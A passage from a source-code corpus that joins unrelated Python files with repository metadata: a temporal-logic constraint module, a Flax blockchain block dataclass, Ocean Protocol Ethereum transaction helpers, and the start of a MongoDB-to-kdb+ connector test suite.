Class to represent a concrete state (whether bound to a variable or seen elsewhere).
"""
def next(self, predicate):
"""
Given a predicate, instantiate an object representing either the next satisfying concrete
state or the next satisfying transition.
"""
if type(predicate) is calls:
return NextTransitionFromConcreteState(self, predicate)
elif type(predicate) is changes:
return NextConcreteStateFromConcreteState(self, predicate)
def __call__(self, program_variable_name: str):
return ValueInConcreteState(self, program_variable_name)
class TransitionExpression():
"""
Class to represent a transition (whether bound to a variable or seen elsewhere).
"""
def duration(self):
return DurationOfTransition(self)
def next(self, predicate):
"""
Given a predicate, instantiate an object representing either the next satisfying concrete
state or the next satisfying transition.
"""
if type(predicate) is calls:
return NextTransitionFromTransition(self, predicate)
elif type(predicate) is changes:
return NextConcreteStateFromTransition(self, predicate)
def before(self):
"""
Instantiate a ConcreteStateBeforeTransition object.
"""
return ConcreteStateBeforeTransition(self)
def after(self):
"""
        Instantiate a ConcreteStateAfterTransition object.
"""
return ConcreteStateAfterTransition(self)
"""
Types of variables.
"""
class ConcreteStateVariable(ConcreteStateExpression):
"""
Class to represent a concrete state captured by a quantifier.
"""
def __init__(self, name):
self._name = name
def __repr__(self):
return self._name
def __eq__(self, other):
return (type(other) is type(self)
and self._name == other._name)
def get_name(self) -> str:
return self._name
class TransitionVariable(TransitionExpression):
"""
Class to represent a transition captured by a quantifier.
"""
def __init__(self, name):
self._name = name
def __repr__(self):
return self._name
def __eq__(self, other):
return (type(other) is type(self)
and self._name == other._name)
def get_name(self) -> str:
return self._name
"""
Attributes of concrete states.
"""
class ValueInConcreteState():
"""
Class to represent the value given to a variable by a concrete state.
"""
def __init__(self, concrete_state_expression, program_variable_name):
self._concrete_state_expression = concrete_state_expression
self._program_variable_name = program_variable_name
def __repr__(self):
return f"{self._concrete_state_expression}({self._program_variable_name})"
def __eq__(self, other):
return (type(other) is type(self)
and self._concrete_state_expression == other._concrete_state_expression
and self._program_variable_name == other._program_variable_name)
def get_concrete_state_expression(self):
return self._concrete_state_expression
def get_program_variable(self):
return self._program_variable_name
def length(self):
return ValueLengthInConcreteState(self)
def __lt__(self, other):
if type(other) in [int, str, float]:
return ValueInConcreteStateLessThanConstant(self, other)
def __gt__(self, other):
if type(other) in [int, str, float]:
return ValueInConcreteStateGreaterThanConstant(self, other)
def equals(self, other):
if type(other) in [int, str, float, bool]:
return ValueInConcreteStateEqualsConstant(self, other)
class ValueLengthInConcreteState(ConstraintBase, NormalAtom):
"""
    Class to represent the expression q(x).length() for a concrete state variable q and a program variable x,
    from which comparisons with constants or transition durations are built.
"""
def __init__(self, value_expression):
self._value_expression = value_expression
def __repr__(self):
return f"{self._value_expression}.length()"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression)
def get_value_expression(self):
return self._value_expression
def __lt__(self, other):
if type(other) in [int, float]:
return ValueLengthInConcreteStateLessThanConstant(self, other)
elif type(other) is DurationOfTransition:
return ValueLengthInConcreteStateLessThanTransitionDuration(self, other)
def __gt__(self, other):
if type(other) in [int, float]:
return ValueLengthInConcreteStateGreaterThanConstant(self, other)
elif type(other) is DurationOfTransition:
return ValueLengthInConcreteStateGreaterThanTransitionDuration(self, other)
def equals(self, other):
if type(other) in [int, float]:
return ValueLengthInConcreteStateEqualsConstant(self, other)
elif type(other) is DurationOfTransition:
return ValueLengthInConcreteStateEqualsTransitionDuration(self, other)
"""
Atomic constraints for concrete states.
"""
class ValueLengthInConcreteStateLessThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x).length() < n for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression} < {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement < self._constant
class ValueLengthInConcreteStateGreaterThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x).length() > n for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression} > {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement > self._constant
class ValueLengthInConcreteStateEqualsConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x).length().equals(n) for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression}.equals({self._constant})"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement == self._constant
class ValueLengthInConcreteStateLessThanTransitionDuration(ConstraintBase, MixedAtom):
"""
Class to represent the atomic constraint q(x).length() < t.duration() for a concrete state variable q, a program variable x
and a transition duration t.duration().
"""
def __init__(self, value_expression, duration):
self._value_expression = value_expression
self._duration = duration
def __repr__(self):
return f"{self._value_expression} < {self._duration}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._duration == other._duration)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
# construct a list of the lhs and rhs of the time between operator
expressions = [self._value_expression, self._duration]
return expressions[index]
def get_lhs_expression(self):
return self.get_expression(0)
def get_rhs_expression(self):
return self.get_expression(1)
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
# first, check to see if both timestamps for the two subatoms have now been recorded
if measurement_dictionary[atom_index].get(0) and measurement_dictionary[atom_index].get(1):
# the measurements exist, so compare them
return measurement_dictionary[atom_index][0] < measurement_dictionary[atom_index][1]
else:
# otherwise, return the atom (this will be returned to the previous level of the formula tree)
return self
class ValueLengthInConcreteStateGreaterThanTransitionDuration(ConstraintBase, MixedAtom):
"""
Class to represent the atomic constraint q(x).length() > t.duration() for a concrete state variable q, a program variable x
and a transition duration t.duration().
"""
def __init__(self, value_expression, duration):
self._value_expression = value_expression
self._duration = duration
def __repr__(self):
return f"{self._value_expression} > {self._duration}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._duration == other._duration)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
# construct a list of the lhs and rhs of the time between operator
expressions = [self._value_expression, self._duration]
return expressions[index]
def get_lhs_expression(self):
return self.get_expression(0)
def get_rhs_expression(self):
return self.get_expression(1)
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
# first, check to see if both timestamps for the two subatoms have now been recorded
if measurement_dictionary[atom_index].get(0) and measurement_dictionary[atom_index].get(1):
# the measurements exist, so compare them
return measurement_dictionary[atom_index][0] > measurement_dictionary[atom_index][1]
else:
# otherwise, return the atom (this will be returned to the previous level of the formula tree)
return self
class ValueLengthInConcreteStateEqualsTransitionDuration(ConstraintBase, MixedAtom):
"""
Class to represent the atomic constraint q(x).length().equals(t.duration()) for a concrete state variable q, a program variable x
and a transition duration t.duration().
"""
def __init__(self, value_expression, duration):
self._value_expression = value_expression
self._duration = duration
def __repr__(self):
return f"{self._value_expression}.equals({self._duration})"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._duration == other._duration)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
# construct a list of the lhs and rhs of the time between operator
expressions = [self._value_expression, self._duration]
return expressions[index]
def get_lhs_expression(self):
return self.get_expression(0)
def get_rhs_expression(self):
return self.get_expression(1)
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
# first, check to see if both timestamps for the two subatoms have now been recorded
if measurement_dictionary[atom_index].get(0) and measurement_dictionary[atom_index].get(1):
# the measurements exist, so compare them
return measurement_dictionary[atom_index][0] == measurement_dictionary[atom_index][1]
else:
# otherwise, return the atom (this will be returned to the previous level of the formula tree)
return self
class ValueInConcreteStateEqualsConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x) == n for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression}.equals({self._constant})"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement == self._constant
class ValueInConcreteStateLessThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x) < n for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression} < {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement < self._constant
class ValueInConcreteStateGreaterThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x) > n for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression} > {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
"""
Attributes of transitions.
"""
class DurationOfTransition():
"""
Class to represent the result of calling .duration() on a transition.
"""
def __init__(self, transition_expression):
self._transition_expression = transition_expression
def __repr__(self):
return f"{self._transition_expression}.duration()"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_expression == other._transition_expression)
def get_transition_expression(self):
return self._transition_expression
    def __lt__(self, other):
        if type(other) in [int, float]:
            return DurationOfTransitionLessThanConstant(self, other)
        if type(other) is ValueInConcreteState:
            return DurationOfTransitionLessThanValueInConcreteState(self, other)
    def __gt__(self, other):
        if type(other) in [int, float]:
            return DurationOfTransitionGreaterThanConstant(self, other)
class ConcreteStateBeforeTransition(ConcreteStateExpression):
"""
Class to represent the first concrete state in a transition.
"""
def __init__(self, transition_expression):
self._transition_expression = transition_expression
def __repr__(self):
return f"{self._transition_expression}.before()"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_expression == other._transition_expression)
def get_transition_expression(self):
return self._transition_expression
class ConcreteStateAfterTransition(ConcreteStateExpression):
"""
Class to represent the second concrete state in a transition.
"""
def __init__(self, transition_expression):
self._transition_expression = transition_expression
def __repr__(self):
return f"{self._transition_expression}.after()"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_expression == other._transition_expression)
def get_transition_expression(self):
return self._transition_expression
"""
Atomic constraints over transitions.
"""
class DurationOfTransitionLessThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the comparison of a transition duration with a constant.
"""
def __init__(self, transition_duration, constant):
self._transition_duration = transition_duration
self._constant = constant
def __repr__(self):
return f"{self._transition_duration} < {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_duration == other._transition_duration
and self._constant == other._constant)
def get_transition_duration_obj(self):
return self._transition_duration
def get_expression(self, index):
return self.get_transition_duration_obj()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement < self._constant
class DurationOfTransitionLessThanValueInConcreteState(ConstraintBase, MixedAtom):
"""
Class to represent the comparison of a transition duration with a value
given to a program variable by a concrete state.
"""
def __init__(self, transition_duration, value_expression):
self._transition_duration = transition_duration
self._value_expression = value_expression
def __repr__(self):
return f"{self._transition_duration} < {self._value_expression}"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_duration == other._transition_duration
and self._value_expression == other._value_expression)
def get_transition_duration(self):
return self._transition_duration
def get_value_expression(self):
return self._value_expression
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
        if measurement_dictionary[atom_index].get(0) is not None and measurement_dictionary[atom_index].get(1) is not None:
# both values exist, so compare them
return measurement_dictionary[atom_index][0] < measurement_dictionary[atom_index][1]
else:
# None is interpreted as inconclusive
return None
class DurationOfTransitionGreaterThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the comparison of a transition duration with a constant.
"""
def __init__(self, transition_duration, constant):
self._transition_duration = transition_duration
self._constant = constant
def __repr__(self):
return f"{self._transition_duration} > {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_duration == other._transition_duration
and self._constant == other._constant)
def get_transition_duration_obj(self):
return self._transition_duration
def get_expression(self, index):
return self.get_transition_duration_obj()
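    def check(self, atom_index, subatom_index, measurement_dictionary):
        """
        Given the measurement found at measurement_dictionary[atom_index][subatom_index],
        check to see whether the constraint expressed by this atom is satisfied.
        """
        # Sketch added for completeness: the original class defined no check method,
        # so this mirrors DurationOfTransitionLessThanConstant.check with the
        # comparison reversed.
        measurement = measurement_dictionary[atom_index][subatom_index]
        return measurement > self._constant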
"""
Temporal operators.
"""
class NextTransitionFromConcreteState(TransitionExpression):
"""
Class to represent the atomic constraint X.next(P) for a concrete state expression X and a predicate P
identifying transitions.
"""
def __init__(self, concrete_state_expression, predicate):
self._concrete_state_expression = concrete_state_expression
self._predicate = predicate
def __repr__(self):
return f"{self._concrete_state_expression}.next({self._predicate})"
def __eq__(self, other):
return (type(other) is type(self)
and self._concrete_state_expression == other._concrete_state_expression
and self._predicate == other._predicate)
def get_concrete_state_expression(self):
return self._concrete_state_expression
def get_predicate(self):
return self._predicate
class NextConcreteStateFromConcreteState(ConcreteStateExpression):
"""
Class to represent the atomic constraint X.next(P) for a concrete state expression X and a predicate P
identifying concrete states.
"""
def __init__(self, concrete_state_expression, predicate):
self._concrete_state_expression = concrete_state_expression
self._predicate = predicate
def __repr__(self):
return f"{self._concrete_state_expression}.next({self._predicate})"
def __eq__(self, other):
return (type(other) is type(self)
and self._concrete_state_expression == other._concrete_state_expression
and self._predicate == other._predicate)
def get_concrete_state_expression(self):
return self._concrete_state_expression
def get_predicate(self):
return self._predicate
class NextTransitionFromTransition(TransitionExpression):
"""
    Class to represent the atomic constraint X.next(P) for a transition expression X and a predicate P
identifying transitions.
"""
def __init__(self, transition_expression, predicate):
self._transition_expression = transition_expression
self._predicate = predicate
def __repr__(self):
return f"{self._transition_expression}.next({self._predicate})"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_expression == other._transition_expression
and self._predicate == other._predicate)
def get_transition_expression(self):
return self._transition_expression
def get_predicate(self):
return self._predicate
class NextConcreteStateFromTransition(ConcreteStateExpression):
"""
    Class to represent the atomic constraint X.next(P) for a transition expression X and a predicate P
identifying concrete states.
"""
def __init__(self, transition_expression, predicate):
self._transition_expression = transition_expression
self._predicate = predicate
def __repr__(self):
return f"{self._transition_expression}.next({self._predicate})"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_expression == other._transition_expression
and self._predicate == other._predicate)
def get_transition_expression(self):
return self._transition_expression
def get_predicate(self):
return self._predicate
"""
Measurement operators.
"""
class TimeBetween():
"""
Class to represent the timeBetween operator.
"""
def __init__(self, concrete_state_expression_1, concrete_state_expression_2):
if (ConcreteStateExpression not in type(concrete_state_expression_1).__bases__
or ConcreteStateExpression not in type(concrete_state_expression_2).__bases__):
raise Exception("timeBetween arguments must be states.")
self._concrete_state_expression_1 = concrete_state_expression_1
self._concrete_state_expression_2 = concrete_state_expression_2
def __repr__(self):
return f"timeBetween({self._concrete_state_expression_1}, {self._concrete_state_expression_2})"
def __eq__(self, other):
return (type(other) is type(self)
and self._concrete_state_expression_1 == other._concrete_state_expression_1
and self._concrete_state_expression_2 == other._concrete_state_expression_2)
def __lt__(self, other):
if type(other) in [int, float]:
return TimeBetweenLessThanConstant(self, other)
def get_lhs_expression(self):
return self._concrete_state_expression_1
def get_rhs_expression(self):
return self._concrete_state_expression_2
class TimeBetweenLessThanConstant(ConstraintBase, MixedAtom):
"""
Class to represent the atomic constraint timeBetween(q, q') < n for some numerical constant n.
"""
def __init__(self, time_between_expression, constant):
self._time_between_expression = time_between_expression
self._constant = constant
self._observed_lhs_value = None
self._observed_rhs_value = None
def __repr__(self):
return f"{self._time_between_expression} < {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._time_between_expression == other._time_between_expression
and self._constant == other._constant)
def get_time_between_expression(self):
return self._time_between_expression
def get_expression(self, index):
# get the time between object
expressions = self.get_time_between_expression()
# construct a list of the lhs and rhs of the time between operator
expressions = [expressions.get_lhs_expression(), expressions.get_rhs_expression()]
return expressions[index]
def get_lhs_expression(self):
return self.get_expression(0)
def get_rhs_expression(self):
return self.get_expression(1)
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
# first, check to see if both timestamps for the two subatoms have now been recorded
        if measurement_dictionary[atom_index].get(0) is not None and measurement_dictionary[atom_index].get(1) is not None:
# the timestamps exist, so take their difference and compare it with self._constant
return abs(measurement_dictionary[atom_index][1] - measurement_dictionary[atom_index][0]) < self._constant
else:
# otherwise, return the atom (this will be returned to the previous level of the formula tree)
return self
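if __name__ == "__main__":
    # Illustrative sketch, not part of the original module: the operator overloads
    # above let atoms be written as ordinary comparisons. The arguments passed to
    # NextTransitionFromConcreteState below are placeholders, not real predicates.
    t = NextTransitionFromConcreteState("q", "changes(x)")
    duration_atom = DurationOfTransition(t) < 5
    print(duration_atom)  # -> q.next(changes(x)).duration() < 5
    gap_atom = TimeBetween(ConcreteStateBeforeTransition(t), ConcreteStateAfterTransition(t)) < 0.5
    print(gap_atom)  # -> timeBetween(q.next(changes(x)).before(), q.next(changes(x)).after()) < 0.5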
| 36.761435
| 133
| 0.679914
|
bc7b9a85b2d135cd2e20ca08de73e01787e1e93d
| 1,822
|
py
|
Python
|
flax/types/unfinished_block.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 174
|
2021-06-16T17:49:22.000Z
|
2022-03-17T03:03:17.000Z
|
flax/types/unfinished_block.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 49
|
2021-06-17T14:10:53.000Z
|
2022-01-31T11:04:21.000Z
|
flax/types/unfinished_block.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 80
|
2021-06-17T14:23:31.000Z
|
2022-02-24T05:52:47.000Z
|
from dataclasses import dataclass
from typing import List, Optional
from flax.types.blockchain_format.foliage import Foliage, FoliageTransactionBlock, TransactionsInfo
from flax.types.blockchain_format.program import SerializedProgram
from flax.types.blockchain_format.reward_chain_block import RewardChainBlockUnfinished
from flax.types.blockchain_format.vdf import VDFProof
from flax.types.end_of_slot_bundle import EndOfSubSlotBundle
from flax.util.ints import uint32
from flax.util.streamable import Streamable, streamable
@dataclass(frozen=True)
@streamable
class UnfinishedBlock(Streamable):
# Full block, without the final VDFs
finished_sub_slots: List[EndOfSubSlotBundle] # If first sb
reward_chain_block: RewardChainBlockUnfinished # Reward chain trunk data
challenge_chain_sp_proof: Optional[VDFProof] # If not first sp in sub-slot
reward_chain_sp_proof: Optional[VDFProof] # If not first sp in sub-slot
foliage: Foliage # Reward chain foliage data
foliage_transaction_block: Optional[FoliageTransactionBlock] # Reward chain foliage data (tx block)
transactions_info: Optional[TransactionsInfo] # Reward chain foliage data (tx block additional)
transactions_generator: Optional[SerializedProgram] # Program that generates transactions
transactions_generator_ref_list: List[
uint32
] # List of block heights of previous generators referenced in this block
@property
def prev_header_hash(self):
return self.foliage.prev_block_hash
@property
def partial_hash(self):
return self.reward_chain_block.get_hash()
def is_transaction_block(self) -> bool:
return self.foliage.foliage_transaction_block_hash is not None
@property
def total_iters(self):
return self.reward_chain_block.total_iters
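# Illustrative note, not part of the original module: given an UnfinishedBlock `ub`
# (for example, one built by a farmer before the final VDFs are known), the
# convenience accessors above are used as:
#     ub.prev_header_hash        # previous block's hash, read from the foliage
#     ub.is_transaction_block()  # True when a foliage transaction block hash is present
#     ub.total_iters             # total iterations, taken from the reward chain block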
| 42.372093
| 104
| 0.791438
|
978bfe491872bcb47a45b6f8ee73fcf16e77b300
| 2,979
|
py
|
Python
|
ocean_lib/web3_internal/transactions.py
|
oceanprotocol/ocean.py
|
0daa7bf22e53a9a13efa2400d16e1991731cfd2c
|
[
"Apache-2.0"
] | 89
|
2020-10-27T08:50:47.000Z
|
2022-03-21T08:42:23.000Z
|
ocean_lib/web3_internal/transactions.py
|
biroedonker/ocean.py
|
68d38cfe6001f07e5102669630c383f5d659a9a8
|
[
"Apache-2.0"
] | 480
|
2020-10-30T07:56:39.000Z
|
2022-03-31T20:01:27.000Z
|
ocean_lib/web3_internal/transactions.py
|
biroedonker/ocean.py
|
68d38cfe6001f07e5102669630c383f5d659a9a8
|
[
"Apache-2.0"
] | 50
|
2020-11-07T15:01:02.000Z
|
2022-03-06T05:49:54.000Z
|
#
# Copyright 2021 Ocean Protocol Foundation
# SPDX-License-Identifier: Apache-2.0
#
from typing import Optional, Union
from enforce_typing import enforce_types
from eth_account.messages import SignableMessage
from ocean_lib.web3_internal.constants import BLOCK_NUMBER_POLL_INTERVAL
from ocean_lib.web3_internal.wallet import Wallet
from ocean_lib.web3_internal.web3_overrides.utils import (
wait_for_transaction_receipt_and_block_confirmations,
)
from web3.datastructures import AttributeDict
from web3.main import Web3
@enforce_types
def sign_hash(msg_hash: SignableMessage, wallet: Wallet) -> str:
"""
    This method uses `personal_sign` for signing a message. It will always prepend the
`\x19Ethereum Signed Message:\n32` prefix before signing.
:param msg_hash:
:param wallet: Wallet instance
:return: signature
"""
s = wallet.sign(msg_hash)
return s.signature.hex()
@enforce_types
def send_ether(from_wallet: Wallet, to_address: str, amount: int) -> AttributeDict:
if not Web3.isChecksumAddress(to_address):
to_address = Web3.toChecksumAddress(to_address)
web3 = from_wallet.web3
chain_id = web3.eth.chain_id
tx = {
"from": from_wallet.address,
"to": to_address,
"value": amount,
"chainId": chain_id,
}
tx["gas"] = web3.eth.estimate_gas(tx)
raw_tx = from_wallet.sign_tx(tx)
tx_hash = web3.eth.send_raw_transaction(raw_tx)
block_confirmations = from_wallet.block_confirmations.value
block_number_poll_interval = BLOCK_NUMBER_POLL_INTERVAL[chain_id]
transaction_timeout = from_wallet.transaction_timeout.value
wait_for_transaction_receipt_and_block_confirmations(
web3,
tx_hash,
block_confirmations,
block_number_poll_interval,
transaction_timeout,
)
return web3.eth.get_transaction_receipt(tx_hash)
@enforce_types
def cancel_or_replace_transaction(
from_wallet: Wallet,
nonce_value: Optional[Union[str, int]] = None,
gas_price: Optional[int] = None,
gas_limit: Optional[int] = None,
) -> AttributeDict:
web3 = from_wallet.web3
chain_id = web3.eth.chain_id
tx = {
"from": from_wallet.address,
"to": from_wallet.address,
"value": 0,
"chainId": chain_id,
}
gas = gas_limit if gas_limit is not None else web3.eth.estimate_gas(tx)
tx["gas"] = gas + 1
raw_tx = from_wallet.sign_tx(tx, fixed_nonce=nonce_value, gas_price=gas_price)
tx_hash = web3.eth.send_raw_transaction(raw_tx)
block_confirmations = from_wallet.block_confirmations.value
block_number_poll_interval = BLOCK_NUMBER_POLL_INTERVAL[chain_id]
transaction_timeout = from_wallet.transaction_timeout.value
wait_for_transaction_receipt_and_block_confirmations(
web3,
tx_hash,
block_confirmations,
block_number_poll_interval,
transaction_timeout,
)
return web3.eth.get_transaction_receipt(tx_hash)
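# Illustrative sketch, not part of the original module. Typical call pattern, assuming
# an already-configured Wallet instance `wallet` and a recipient address `to_address`:
#     receipt = send_ether(wallet, to_address, amount=10**18)  # amount is in wei
#     signature = sign_hash(encode_defunct(hexstr=agreement_hash), wallet)
# where encode_defunct comes from eth_account.messages and agreement_hash is a hex string.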
| 32.736264
| 86
| 0.732796
|
52ea2c63bf9729a6da8b9a2828cb094225e7649f
| 11,786
|
py
|
Python
|
tests/test_kdb.py
|
ghaughian/kdb-doc-manager
|
989e21e9a1be80b1cc991d2dbb453e30ad20db70
|
[
"Apache-2.0"
] | 1
|
2019-05-02T14:40:15.000Z
|
2019-05-02T14:40:15.000Z
|
tests/test_kdb.py
|
ghaughian/kdb-doc-manager
|
989e21e9a1be80b1cc991d2dbb453e30ad20db70
|
[
"Apache-2.0"
] | null | null | null |
tests/test_kdb.py
|
ghaughian/kdb-doc-manager
|
989e21e9a1be80b1cc991d2dbb453e30ad20db70
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test KDB using the synchronizer, i.e. as it would be used by an user
"""
import logging
import os
import sys
import time
from bson import SON
from mongo_connector.compat import u
from mongo_connector.connector import Connector
from mongo_connector.test_utils import ReplicaSet, assert_soon
from mongo_connector.util import retry_until_ok
from qpython import qconnection
from qpython.qtype import QException
sys.path[0:0] = [""]
from mongo_connector.doc_managers.kdb_doc_manager import DocManager
from tests import unittest, kdb_url
class KdbTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.kdb_conn = qconnection.QConnection(host=kdb_url.split(':')[0], port=int(kdb_url.split(':')[1]))
cls.kdb_conn.open()
cls.docman = DocManager(kdb_url, unique_key='id')
def setUp(self):
# Create test database in KDB+
self.kdb_conn.sync("`.test.test set ([]id:(); ts:`long$(); ns:(); name:(); title:(); description:(); subject:(); data:(); a:`int$(); b_0_c:`int$(); b_10_c:`int$(); b_0_e:`int$(); b_1_d:`int$(); b_1_f:`int$(); b_2_e:`int$(); billing_address_street:(); billing_address_state:(); numbers_0:(); numbers_1:(); numbers_2:(); characters_0_name:(); characters_0_color:(); characters_1_name:(); characters_1_color:(); characters_2:(); popularity:`int$());")
def _search(self, query):
return self.docman._stream_search(query)
def _remove(self):
self.kdb_conn.sync("![`.test;();0b;enlist`test];`.test.test set ([]id:(); ts:`long$(); ns:(); name:(); title:(); description:(); subject:(); data:(); a:`int$(); b_0_c:`int$(); b_10_c:`int$(); b_0_e:`int$(); b_1_d:`int$(); b_1_f:`int$(); b_2_e:`int$(); billing_address_street:(); billing_address_state:(); numbers_0:(); numbers_1:(); numbers_2:(); characters_0_name:(); characters_0_color:(); characters_1_name:(); characters_1_color:(); characters_2:(); popularity:`int$());")
class TestKdb(KdbTestCase):
""" Tests Kdb
"""
@classmethod
def setUpClass(cls):
KdbTestCase.setUpClass()
cls.repl_set = ReplicaSet().start()
cls.conn = cls.repl_set.client()
@classmethod
def tearDownClass(cls):
""" Kills cluster instance
"""
cls.repl_set.stop()
def setUp(self):
self._remove()
try:
os.unlink("oplog.timestamp")
except OSError:
pass
open("oplog.timestamp", "w").close()
docman = DocManager(kdb_url, unique_key='id')
self.connector = Connector(
mongo_address=self.repl_set.uri,
ns_set=['test.test'],
doc_managers=(docman,),
)
retry_until_ok(self.conn.test.test.drop)
self._remove()
self.connector.start()
assert_soon(lambda: len(self.connector.shard_set) > 0)
def tearDown(self):
self.connector.join()
def test_insert(self):
"""Tests insert
"""
self.conn['test']['test'].insert_one({'name': 'paulie'})
assert_soon(lambda: sum(1 for _ in self.kdb_conn.sync('?[.test.test;();0b;()]')) > 0)
result_set_1 = self.kdb_conn.sync('?[.test.test;enlist(~\:;`name;"paulie");0b;()]')
self.assertEqual(len(result_set_1), 1)
result_set_2 = self.conn['test']['test'].find_one()
for item in result_set_1:
doc = {}
for k, v in item.items():
doc[k] = v
self.assertEqual(doc['id'], str(result_set_2['_id']))
self.assertEqual(doc['name'], result_set_2['name'])
def test_remove(self):
"""Tests remove
"""
self.conn['test']['test'].insert_one({'name': 'paulie'})
